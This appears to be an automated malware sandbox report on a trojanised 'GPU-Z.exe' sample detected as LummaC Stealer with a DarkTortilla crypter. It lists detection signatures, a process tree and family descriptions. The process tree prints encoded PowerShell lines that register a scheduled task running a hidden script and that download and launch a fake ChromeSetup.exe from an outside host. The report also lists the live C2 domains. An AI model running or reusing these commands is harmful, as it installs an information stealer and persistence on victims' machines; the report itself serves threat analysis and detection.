Windows
Analysis Report
GPU-Z.exe
Overview
General Information
Detection
LummaC, DarkTortilla, LummaC Stealer
Metric | Value
---|---
Score | 100
Range | 0 - 100
Whitelisted | false
Confidence | 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Tries to delay execution (extensive OutputDebugStringW loop)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- GPU-Z.exe (PID: 4720 cmdline: "C:\Users\user\Desktop\GPU-Z.exe" MD5: 8A610C8380B7BC7C95472EA19CE2D4F3)
  - AddInProcess32.exe (PID: 4760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  - AddInProcess32.exe (PID: 3692 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  - AddInProcess32.exe (PID: 4072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  - AddInProcess32.exe (PID: 3920 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  - cmd.exe (PID: 3660 cmdline: "cmd" /c powershell -win 1 -noni -enc JABoACAAPQAgACgARwBlAHQALQBEAGEAdABlACkALgBoAG8AdQByADsAIAAkAG0AIAA9ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAuAEEAZABkAE0AaQBuAHUAdABlAHMAKAAyACkALgBtAGkAbgB1AHQAZQA7ACAAJABUAHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBPAG4AYwBlACAALQBBAHQAIAAiACQAaABgADoAJABtACIAOwAgACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAIgBjAG0AZAAiACAALQBBAHIAZwB1AG0AZQBuAHQAIAAiAC8AYwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAHcAaQBuACAAMQAgAC0AbgBvAG4AaQAgAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAGYAaQBsAGUAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAE0AZQBkAGkAYQBTAHQAbwByAGEAZwBlAFwAdQBwAGQAYQB0AGUALgBwAHMAMQAiADsAIAAkAFAAcgBpAG4AYwBpAHAAYQBsACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBQAHIAaQBuAGMAaQBwAGEAbAAgAC0AVQBzAGUAcgBJAGQAIAAkAEUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAiAE0AZQBkAGkAYQBVAHAAZABhAHQAZQAiACAALQBUAHIAaQBnAGcAZQByACAAJABUAHIAaQBnAGcAZQByACAALQBBAGMAdABpAG8AbgAgACQAQQBjAHQAaQBvAG4AIAAtAFAAcgBpAG4AYwBpAHAAYQBsACAAJABQAHIAaQBuAGMAaQBwAGEAbAA= MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 3840 cmdline: powershell -win 1 -noni -enc JABoACAAPQAgACgARwBlAHQALQBEAGEAdABlACkALgBoAG8AdQByADsAIAAkAG0AIAA9ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAuAEEAZABkAE0AaQBuAHUAdABlAHMAKAAyACkALgBtAGkAbgB1AHQAZQA7ACAAJABUAHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBPAG4AYwBlACAALQBBAHQAIAAiACQAaABgADoAJABtACIAOwAgACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAIgBjAG0AZAAiACAALQBBAHIAZwB1AG0AZQBuAHQAIAAiAC8AYwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAHcAaQBuACAAMQAgAC0AbgBvAG4AaQAgAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAGYAaQBsAGUAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAE0AZQBkAGkAYQBTAHQAbwByAGEAZwBlAFwAdQBwAGQAYQB0AGUALgBwAHMAMQAiADsAIAAkAFAAcgBpAG4AYwBpAHAAYQBsACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBQAHIAaQBuAGMAaQBwAGEAbAAgAC0AVQBzAGUAcgBJAGQAIAAkAEUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAiAE0AZQBkAGkAYQBVAHAAZABhAHQAZQAiACAALQBUAHIAaQBnAGcAZQByACAAJABUAHIAaQBnAGcAZQByACAALQBBAGMAdABpAG8AbgAgACQAQQBjAHQAaQBvAG4AIAAtAFAAcgBpAG4AYwBpAHAAYQBsACAAJABQAHIAaQBuAGMAaQBwAGEAbAA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - cmd.exe (PID: 6972 cmdline: "cmd" /c powershell -win 1 -noni -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAGMAaAByAG8AbQBlAC0AYgByAG8AdwBzAGUAcgAtAGQAbwB3AG4AbABvAGEAZAAuAGMAbwBtAC8AQwBoAHIAbwBtAGUAUwBlAHQAdQBwAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABDAGgAcgBvAG0AZQBTAGUAdAB1AHAALgBlAHgAZQAiADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAGUAbgB2ADoAVABFAE0AUABcAEMAaAByAG8AbQBlAFMAZQB0AHUAcAAuAGUAeABlACIA MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 4124 cmdline: powershell -win 1 -noni -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAGMAaAByAG8AbQBlAC0AYgByAG8AdwBzAGUAcgAtAGQAbwB3AG4AbABvAGEAZAAuAGMAbwBtAC8AQwBoAHIAbwBtAGUAUwBlAHQAdQBwAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABDAGgAcgBvAG0AZQBTAGUAdAB1AHAALgBlAHgAZQAiADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAGUAbgB2ADoAVABFAE0AUABcAEMAaAByAG8AbQBlAFMAZQB0AHUAcAAuAGUAeABlACIA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - ChromeSetup.exe (PID: 4304 cmdline: "C:\Users\user\AppData\Local\Temp\ChromeSetup.exe" MD5: 6DF42D2EACF5B2916299DDC1AF4A7DDF)
  - updater.exe (PID: 6048 cmdline: "C:\Windows\SystemTemp\Google4304_299551820\bin\updater.exe" --install=appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={8E7848EA-F143-48B2-373C-33F54B7527D1}&lang=en-GB&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-statsdef_1&installdataindex=empty --enable-logging --vmodule=*/components/winhttp/*=1,*/components/update_client/*=2,*/chrome/enterprise_companion/*=2,*/chrome/updater/*=2 MD5: 9DB9D09B6A58E5C09773F754504AC148)
  - updater.exe (PID: 2608 cmdline: C:\Windows\SystemTemp\Google4304_299551820\bin\updater.exe --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\132.0.6833.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=132.0.6833.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0xbc9488,0xbc9494,0xbc94a0 MD5: 9DB9D09B6A58E5C09773F754504AC148)
- svchost.exe (PID: 4508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cmd.exe (PID: 2520 cmdline: C:\Windows\system32\cmd.EXE /c powershell -win 1 -noni -ep bypass -file C:\Users\user\AppData\Local\MediaStorage\update.ps1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 5588 cmdline: powershell -win 1 -noni -ep bypass -file C:\Users\user\AppData\Local\MediaStorage\update.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
- chrome.exe (PID: 6340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://support.google.com/installer/?product=&error=75035 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  - chrome.exe (PID: 6492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2028,i,8218608324562589918,13039616218442769122,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 4416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://support.google.com/installer/?product=&error=75035 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  - chrome.exe (PID: 1776 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2024,i,80333394096213294,6915374060940689089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://support.google.com/installer/?product=&error=75035 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  - chrome.exe (PID: 892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=2000,i,5810222806604600449,1391955646674968393,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | |
DarkTortilla | DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021. | No Attribution | |
{"C2 url": ["energyaffai.lat", "grannyejh.lat", "aspecteirs.lat", "necklacebudi.lat", "crosshuaht.lat", "sustainskelet.lat", "discokeyus.lat", "rapeflowwj.lat"], "Build id": "bFcGh6--1912"}
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security |
System Summary

Source | Author
---|---
| pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
| Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community